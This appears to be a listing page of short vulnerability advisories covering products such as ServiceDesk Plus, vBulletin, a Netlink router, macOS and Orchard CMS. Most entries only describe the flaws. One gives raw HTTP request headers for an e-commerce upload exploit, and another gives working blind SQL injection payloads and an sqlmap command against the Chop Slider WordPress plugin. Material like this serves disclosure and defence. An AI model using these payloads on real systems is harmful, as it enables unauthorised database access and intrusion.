Default installations of ManageEngine ServiceDesk Plus 10.0 were found to be vulnerable to a XSS injected by a workstation local administrator. Using the installed program names of the computer as a vector, the local administrator can execute JavaScript cods in the context of the ManageEngine ServiceDesk Plus application.
A vulnerability in vBulletin 5.6.1 prior to Patch Level 1 allows an attacker to inject arbitrary SQL commands via the 'nodeId' parameter. This can be exploited to gain access to the database and potentially gain remote code execution.
E-Commerce System Using PHP/MySQLi - Unauthenticated Remote Code Execution + Unauthenticated SQL Injection. POST /ecommerce/customer/controller.php?action=photos HTTP/1.1 Host: thiennv.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------270177040916945863071313890828 Content-Length: 4723 Origin: http://thiennv.com Connection: close Referer: http://thiennv.com/ecommerce/index.php?q=profile Cookie: advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5; _icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU; wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7 Upgrade-Insecure-Requests: 1
A vulnerability in Netlink XPON 1GE WiFi V2801RGW allows an attacker to execute arbitrary commands on the device by sending a specially crafted HTTP request. The vulnerability exists due to insufficient validation of user-supplied input in the target_addr parameter of the /boaform/admin/formPing page. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable device. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the vulnerable device.
An SQL injection vulnerability exists in Complaint Management System 1.0, which allows an attacker to inject arbitrary SQL commands via the 'username' parameter. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the 'username' parameter, in order to bypass authentication or retrieve sensitive data from the database.
This exploit is a privilege escalation vulnerability in macOS versions < 10.15.1. It is possible to gain root access by creating a bogus man page, creating a symlink in /usr/local/share/man/, creating a script file to be called by LaunchDaemon, and creating a python script to be called by the LaunchDaemon.
Eagle is a software written in Java by TylerTech. Version 2018.3.11 allows an unauthenticated attacker to cause the software to deserialize untrusted data that can result in remote code execution. /recorder/ServiceManager in TylerTech Eagle 2018.3.11 is vulnerable to remote code execution via deserialization of untrusted user input from an authenticated user. The executed code will run as the tomcat service that is running the application.
In the 'Media Manager' area, Users with low privileges (Editor) can bypass file upload restrictions, resulting in arbitrary command execution.
A blind SQL injection vulnerability is present in Chop Slider 3 '/wp-content/plugins/chopslider/get_script/index.php': $cs_result = $wpdb->get_row('SELECT * FROM ' . CHOPSLIDER_TABLE_NAME . ' WHERE chopslider_id =' . $id);. PoC: Blind SQL injection: GET /wp-content/plugins/chopslider/get_script/index.php?id=1111111 or (SELECT sleep(10))=6868 SQLMap using: sqlmap -u 'http://localhost/wp-content/plugins/chopslider/get_script/index.php?id=1111111111' --level=5 --risk=3 sqlmap identified the following injection point(s) with a total of 17611 HTTP(s) requests: Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-3097 OR 2236=2236 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=1111111111 OR SLEEP(5)
Persistent Cross-site scripting (Stored XSS) vulnerabilities in Orchard CMS - Orchard Core RC1 allow remote attackers to inject arbitrary web script or HTML via create or edit blog content.
Services By CQR